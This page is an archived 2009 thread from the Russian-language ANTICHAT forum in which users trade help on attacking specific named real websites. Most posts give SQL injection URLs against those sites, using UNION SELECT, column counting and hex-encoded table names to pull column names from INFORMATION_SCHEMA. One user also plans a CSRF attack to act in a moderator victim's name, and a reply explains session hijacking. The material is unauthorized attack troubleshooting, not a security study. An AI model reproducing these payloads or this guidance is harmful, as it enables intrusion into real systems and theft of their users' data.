HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4861  
Старый 22.01.2009, 04:00
Qam
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040

Репутация: 15
По умолчанию

Я в пыхе не очень,но понял на счет переменной сид вот что:
если $сид пуста или $сид не равна $юсердата со значением $сесион_ид(если праильно понял $сесион_ид в таких скобках [] была)то показать ошибку на счет сесии как я писал где переменая $юсердата равна $ип и $логин,а $сесион_ид равна $ип,$автологин,$админ,$юсер_и д и еще 2словам без знака переменых это наверное значение из таблицы мускула!Кто подскажет обломавыется ли моя CSRF?Может я смогу подделать эту переменую сид.
 
Ответить с цитированием

  #4862  
Старый 22.01.2009, 04:30
RekRut
Участник форума
Регистрация: 27.02.2006
Сообщений: 261
Провел на форуме:
515774

Репутация: 71
По умолчанию

Qam хз че ты написал чесно в пол третьего ночи тяжело думается, а поделу
SID ето тот идентификатор с которым ты лазишь по форумк послу того как успешно залогинился, он может связываться с твоим логином на сайте а может и с логином и пароль сразу , хранится в базе на серве до окончания сессии пока не пройдет определенное количество времени или ты не закроешь браузер,

если ты думаешь что тупо изменить СИД на другой СИд другого юзверя то такой вариант прокатит только если в кукисах не хранится твой зашифрованный пароль, и если СИД еще жив (тоесть жертва не закрыла браузер)
 
Ответить с цитированием

  #4863  
Старый 22.01.2009, 04:46
Qam
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040

Репутация: 15
По умолчанию

RekRut ты похоже понял так:что я хочу просто в юрл заменить свой сид на его и типа я стал им!Нет я хочу совсем другого подсунуть ему адрес сайта перейдя на который его браузер обратится на другой сайт где выпалнит мод его именем (именем атакуемого чела) отправит приват или откроет закрытую тему если он модер конечно!Вот для этого мне и нужно разобраться что есть эта переменая сид,а браузер он полюбому не закроет тк он им же и перейдет на подсунутый мной сайт!(значит сессия будет еще жива)!Смогу ли я подделать эту переменую сид?Чтобы быть более ясне могу выложить кусочек кода если я своими словами плохо объяснил!
 
Ответить с цитированием

  #4864  
Старый 22.01.2009, 05:24
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

а как с такой таблы достать поля?
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 -- не катит

Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+user+from+tk_users--
 
Ответить с цитированием

  #4865  
Старый 22.01.2009, 08:20
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

1.как узнать количество полей?

http://elitka.com.ua/view.php?id=381%27

2. и вот такая трабла
Код:
http://vitlen.com.ua/index.php?categoryID=128%20order%20by%201%20--
отбражает исходную
Код:
http://vitlen.com.ua/index.php?categoryID=128%20UNION%20SELECT%201%20--
вывод The used SELECT statements have a different number of columns

Последний раз редактировалось TELO; 22.01.2009 в 08:34..
 
Ответить с цитированием

  #4866  
Старый 22.01.2009, 08:31
Doom123
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248

Репутация: 668


Отправить сообщение для Doom123 с помощью ICQ
По умолчанию

Цитата:
а как с такой таблы достать поля?
FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 -- не катит
за хекси Users а знак (=) замени на like

FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE 0x5573657273 LIMIT 1,1

Последний раз редактировалось Doom123; 22.01.2009 в 08:34..
 
Ответить с цитированием

  #4867  
Старый 22.01.2009, 08:34
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

TELO
Цитата:
http://elitka.com.ua/cat.php?c=1+union+select+1,2,3,4,5,6--
5 ветка..

Цитата:
http://vitlen.com.ua/index.php?categoryID=-128+union+select+1--
так нету ошибки.. а при 1,2 есть...

Последний раз редактировалось sabe; 22.01.2009 в 08:37..
 
Ответить с цитированием

  #4868  
Старый 22.01.2009, 08:39
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Цитата:
Сообщение от Doom123  
за хекси Users а знак (=) замени на like

FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME LIKE 0x5573657273 LIMIT 1,1
непрокатило
Код:
http://www.bookzone.com.ua/catalog.php?cid=-11028+union+select+COLUMN_NAME+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20LIKE=0x5573657273%20LIMIT%200,1%20--
 
Ответить с цитированием

  #4869  
Старый 22.01.2009, 08:47
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

TELO
после like не = а +

* = используем когда непосредственно извлекаем где table_name=0x[table_hex]
 
Ответить с цитированием

  #4870  
Старый 22.01.2009, 08:48
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

Цитата:
Сообщение от sabe  
TELO

5 ветка..


так нету ошибки.. а при 1,2 есть...
не там и не там нет вывода
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ